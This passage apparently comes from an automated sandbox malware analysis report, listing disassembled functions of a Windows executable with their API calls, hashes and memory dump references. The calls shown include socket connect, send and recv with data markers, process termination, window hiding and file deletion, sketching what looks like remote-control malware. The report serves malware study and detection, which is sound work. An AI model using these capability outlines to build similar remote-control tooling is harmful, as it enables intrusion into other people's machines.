                                                Similarity
                                                • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                                • String ID: p6A
                                                • API String ID: 3506253819-595022129
                                                • Opcode ID: 5dcf762cff37be4c0ee91825e39ed3615af4cc7cc7487535360c8d41685ac89c
                                                • Instruction ID: 2da7447eaa2533d7fa05e4f7eb75ee576f8c262167eb834b3f2e31fdf984cb95
                                                • Opcode Fuzzy Hash: 5dcf762cff37be4c0ee91825e39ed3615af4cc7cc7487535360c8d41685ac89c
                                                • Instruction Fuzzy Hash: EB11097660010CFFDB15DF95DC40DEFBBBDEB88251B10446ABA06D2250DA31AF549B64
                                                Function 004124FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegisterClassExA.USER32(00000030), ref: 00412541
                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041255C
                                                • GetLastError.KERNEL32(?,00000000), ref: 00412566
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                • String ID: 0$MsgWindowClass
                                                • API String ID: 2877667751-2410386613
                                                • Opcode ID: 4d894a20b8f5097cd5e5cfb21d32c58b837329f92c579e8eceaa010815363f8e
                                                • Instruction ID: c5746b5c4cd6dfb1d3391631de87553e0a878e129e9edab4fe75234bd391cf3e
                                                • Opcode Fuzzy Hash: 4d894a20b8f5097cd5e5cfb21d32c58b837329f92c579e8eceaa010815363f8e
                                                • Instruction Fuzzy Hash: 4C0148B1D01228BACB11DF95DC489DFBEBDEF457A1B404126F815E6250D7B05605CAE4
                                                Function 0040A163 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 0040A1A3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040A1AD
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040A1C1
                                                  • Part of subcall function 004020D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00419D80,[INFO],00419288,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF), ref: 004020E2
                                                  • Part of subcall function 004020D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 004020EF
                                                  • Part of subcall function 004020D0: malloc.MSVCRT ref: 004020FC
                                                  • Part of subcall function 004020D0: recv.WS2_32(00419D80,00000000,00000000,00000000), ref: 0040210D
                                                  • Part of subcall function 004020D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402121
                                                  • Part of subcall function 004020D0: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 0040212B
                                                  • Part of subcall function 004020D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402134
                                                  • Part of subcall function 004020D0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402141
                                                  • Part of subcall function 004020D0: free.MSVCRT ref: 00402162
                                                  • Part of subcall function 004020D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402184
                                                  • Part of subcall function 004020D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 0040218D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040A1EC,00000000,?,?,?,?,?,?), ref: 0040A1D8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040A1E1
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                                • String ID:
                                                • API String ID: 901373779-0
                                                • Opcode ID: 186e1e575453a93131500724bc0a2918437ca587c0383a65697756dcc80b16cb
                                                • Instruction ID: dc797b2bd405412177491f68feb4c10e2438585a7ec308f79a616d7bf65c18bc
                                                • Opcode Fuzzy Hash: 186e1e575453a93131500724bc0a2918437ca587c0383a65697756dcc80b16cb
                                                • Instruction Fuzzy Hash: 2101DF32A0020467C700FE69DC469EF376CAB51344F40457EF902A71C2EAB89A1882EA
                                                Function 0040DD80 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DD91
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419210), ref: 0040DDCB
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419210), ref: 0040DDDF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@connectsocket
                                                • String ID:
                                                • API String ID: 1130490860-0
                                                • Opcode ID: fdddec3ecd6cbbf15f27475dbb4093a4cb12baa0c351139c79aae44c04f5d715
                                                • Instruction ID: d03f75511b5b9a06d23d7441dada9d0d681202ad64a5902a567384428990feb0
                                                • Opcode Fuzzy Hash: fdddec3ecd6cbbf15f27475dbb4093a4cb12baa0c351139c79aae44c04f5d715
                                                • Instruction Fuzzy Hash: AA011E32A8010567DB04BBE5A96A5FE3722EB42705B108CBFF603671E2DABC4D45C75E
                                                Function 004114E6 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 004114FB
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0041150D
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00411519
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041153A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411543
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                                • String ID:
                                                • API String ID: 1435062097-0
                                                • Opcode ID: 52cac590ed783dec126cf6fc3c838a862a650957abe21f065b7382abee4ba981
                                                • Instruction ID: 5076fcb9395579bbddab17212b246615a5c91126fabc10d9ca548819b39c8c2f
                                                • Opcode Fuzzy Hash: 52cac590ed783dec126cf6fc3c838a862a650957abe21f065b7382abee4ba981
                                                • Instruction Fuzzy Hash: 88017C7540015AABCF009FA4EC889EE7BB8FF89311F008499EC1697291DB34AB45CB54
                                                Function 00404469 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404477
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404484
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00404491
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040449E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004044AB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                                • String ID:
                                                • API String ID: 1622488342-0
                                                • Opcode ID: 79c99ccc922af809612ad1bdd56b77f35c4675c1c134b2728a01232f1cc9555f
                                                • Instruction ID: 28048e856c008a7e903b93f8690dad49212d8798c9890552099e078d228dae77
                                                • Opcode Fuzzy Hash: 79c99ccc922af809612ad1bdd56b77f35c4675c1c134b2728a01232f1cc9555f
                                                • Instruction Fuzzy Hash: 4FF03C7240465AAFCF10DFA4D9888DABBFCBE1820930048AEE183D3504EA70F30ECB14
                                                Function 004024A6 Relevance: 7.5, APIs: 5, Instructions: 34networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(00000000,00000001,00000006), ref: 004024B0
                                                • connect.WS2_32(00000000,00419298,00000010), ref: 004024BF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00419288,?,00401671,00000061), ref: 004024D2
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                  • Part of subcall function 004023C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                  • Part of subcall function 004023C0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                  • Part of subcall function 004023C0: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040243B
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                • closesocket.WS2_32(00000000), ref: 004024EA
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,00419298,00000010,00000000,00000001,00000006,00419288,?,00401671,00000061), ref: 004024F5
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                                • String ID:
                                                • API String ID: 3330461409-0
                                                • Opcode ID: c644a98ad5c57ec4db41b23711807534afb82d367d594494b2a8a1cbd4bbee7c
                                                • Instruction ID: 8da2edabb2911e70e067a7e3736767e3273b8bf97842aaef525eaa9dcb46e4a8
                                                • Opcode Fuzzy Hash: c644a98ad5c57ec4db41b23711807534afb82d367d594494b2a8a1cbd4bbee7c
                                                • Instruction Fuzzy Hash: B6F0273164022477DB203A759D0ABDF3B089F017A5F008166FD19A61C1EAF99A6182DD
                                                Function 0040D671 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D681
                                                • atoi.MSVCRT(00000000), ref: 0040D688
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0040D690
                                                  • Part of subcall function 00411221: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041122E
                                                  • Part of subcall function 00411221: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041123C
                                                  • Part of subcall function 00411221: CloseHandle.KERNEL32(00000000), ref: 00411248
                                                  • Part of subcall function 0040E7A5: EnumWindows.USER32(Function_0000E6BB,00000000), ref: 0040E7AC
                                                  • Part of subcall function 0040E7A5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419D70), ref: 0040E7BC
                                                  • Part of subcall function 0040E7A5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670,00000063), ref: 0040E7D8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                                • String ID:
                                                • API String ID: 2919580351-0
                                                • Opcode ID: c4b95e7ee75d05150326825ce9c16cd502c10771a0d6432c3724afe71976b471
                                                • Instruction ID: fbf98ad25b9445c549c0965424398f3c1f2843660656d438c48286494582a4b9
                                                • Opcode Fuzzy Hash: c4b95e7ee75d05150326825ce9c16cd502c10771a0d6432c3724afe71976b471
                                                • Instruction Fuzzy Hash: 87F05E32900109DBDB04FFF2EC4A9ED7734FB10306F10487AE102E20E0EE384A418B18
                                                Function 00410D97 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410DAE
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00410DC2
                                                • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00414BC8,6C995E08), ref: 00410DD7
                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00410DE6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410DEF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                                • String ID:
                                                • API String ID: 758954411-0
                                                • Opcode ID: 2ddcbae372ca48f4ff6de927c7caed79fef32ed579a774721d24df48c5041ce9
                                                • Instruction ID: ae3dcd65f651705cd5d912b5defe96ded6a20efac9de096208c0291c34e43b6b
                                                • Opcode Fuzzy Hash: 2ddcbae372ca48f4ff6de927c7caed79fef32ed579a774721d24df48c5041ce9
                                                • Instruction Fuzzy Hash: 90F0BD7554010EAFDF00EF90ED49FED7B78EB1830AF1080A1F505A60A0DA70AB49CF55
                                                Function 00406037 Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419830,6C9BB310,004060B0), ref: 0040603E
                                                • DeleteFileW.KERNEL32(00000000), ref: 00406045
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(004197CC,004137F0), ref: 00406059
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406067
                                                • RemoveDirectoryW.KERNEL32(00000000), ref: 0040606E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                                • String ID:
                                                • API String ID: 1823182134-0
                                                • Opcode ID: 3397cdc29c566b3531d2a528448e1be8175be17ca98253568386dba195db2a14
                                                • Instruction ID: 8a75d147cbd1fd7954b2d92d06643d0a6b0c30aa724540facd61759a062ecc4e
                                                • Opcode Fuzzy Hash: 3397cdc29c566b3531d2a528448e1be8175be17ca98253568386dba195db2a14
                                                • Instruction Fuzzy Hash: BFE086B2682331ABCE046FA4AC0D9CA376CAE05263300807AF813E31A0CF789E44C75C
                                                Function 0040D645 Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000003), ref: 0040D657
                                                • atoi.MSVCRT(00000000), ref: 0040D65E
                                                • ShowWindow.USER32(00000000), ref: 0040D666
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                                • String ID:
                                                • API String ID: 4290155986-0
                                                • Opcode ID: e7232a7d1907fcb32fe0fa8a415ed6137423bbdee974a988ed8be201f0a4d605
                                                • Instruction ID: 27736a11c1144afb6c44707fde786c671dd5af3150eaaae4ca58e16da3112487
                                                • Opcode Fuzzy Hash: e7232a7d1907fcb32fe0fa8a415ed6137423bbdee974a988ed8be201f0a4d605
                                                • Instruction Fuzzy Hash: 12E0C935A001158BCB05AFB1ED5EAED7724FB50716F10887AE113E20E0DF789A05CB19
                                                Function 0040D61F Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D62B
                                                • atoi.MSVCRT(00000000), ref: 0040D632
                                                • CloseWindow.USER32(00000000), ref: 0040D63A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
